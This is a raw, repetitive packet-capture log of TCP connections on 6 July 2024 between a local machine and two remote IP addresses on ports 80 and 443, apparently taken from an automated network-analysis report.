                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607083082 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607093096 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607131004 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607702971 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607753992 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607763052 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607800007 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607825041 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607844114 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607855082 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.607889891 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608599901 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608608961 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608620882 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608661890 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608746052 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608756065 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.608794928 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609430075 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609441042 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609450102 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609482050 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609517097 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609541893 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609551907 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.609589100 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.611658096 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.674324989 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696404934 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696435928 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696446896 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696475983 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696526051 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696537018 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696547985 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696561098 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696569920 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696604967 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696763039 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696815968 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696836948 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696856022 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696867943 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.696903944 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697011948 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697021961 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697032928 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697043896 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697052002 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697092056 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697809935 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697820902 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697832108 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697880983 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.697909117 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700386047 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700404882 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700416088 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700429916 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700459957 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700469971 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.700493097 CEST4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.705771923 CEST8049762192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.897566080 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.902570009 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.902626038 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.902744055 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.907493114 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.116141081 CEST44349761162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.116205931 CEST44349761162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.116245985 CEST49761443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.116944075 CEST49761443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.124463081 CEST44349763162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.182842970 CEST49763443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.182854891 CEST44349763162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.250072002 CEST49765443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.250102043 CEST44349765162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.250164986 CEST49765443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.252137899 CEST49765443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.252150059 CEST44349765162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497742891 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497760057 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497771025 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497788906 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497798920 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497808933 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497823000 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497843027 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497876883 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497931957 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497942924 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497967958 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497991085 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.498028040 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502677917 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502734900 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502746105 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502783060 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502799988 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502844095 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588438988 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588464975 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588476896 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588510990 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588536978 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588547945 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588567972 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588866949 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588902950 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588927031 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588937044 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588958979 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.588968992 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589452982 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589472055 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589504004 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589529991 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589545965 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589561939 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589620113 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.589658022 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590274096 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590306044 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590317011 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590342999 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590418100 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590429068 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.590461016 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591126919 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591166973 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591190100 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591201067 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591231108 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591248989 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591273069 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.591372013 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.593523026 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.674339056 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679564953 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679584026 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679595947 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679653883 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679747105 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679757118 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679768085 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679780006 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679794073 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679822922 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679929972 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679958105 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679969072 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.679979086 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680054903 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680119038 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680130959 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680146933 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680160999 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680169106 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680217981 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680830956 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680846930 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680857897 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680890083 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680958986 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680969954 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680983067 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.680990934 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681000948 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681020975 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681679964 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681689024 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681699991 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681730032 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681757927 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681864023 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681874990 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681885958 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681899071 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681909084 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.681938887 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684043884 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684057951 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684068918 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684102058 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684108973 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684119940 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684132099 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684144020 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684150934 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684169054 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684405088 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684454918 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684464931 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684488058 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684499979 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684536934 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684564114 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684576035 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684586048 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684602022 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684636116 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684786081 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684796095 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684804916 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684823990 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684830904 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684843063 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684854031 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684863091 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684871912 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.684889078 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.694700003 CEST44349763162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.694765091 CEST44349763162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.694928885 CEST49763443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.695286989 CEST49763443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770724058 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770739079 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770750999 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770762920 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770773888 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770800114 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770838976 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770848989 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770860910 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770869970 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770881891 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770893097 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770901918 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770915031 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770942926 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.770989895 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771002054 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771023989 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771612883 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771625042 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771635056 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771647930 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771660089 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771672010 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771689892 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771698952 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771708965 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771719933 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771727085 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771739960 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771752119 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771759033 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771775007 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771779060 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771797895 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771809101 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771817923 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771827936 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771840096 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771852970 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771862030 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771881104 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771931887 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771941900 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771960974 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771969080 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771979094 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771990061 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.771998882 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772008896 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772027969 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772202969 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772259951 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772620916 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772717953 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772728920 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772764921 CEST4976480192.168.2.4192.3.140.185
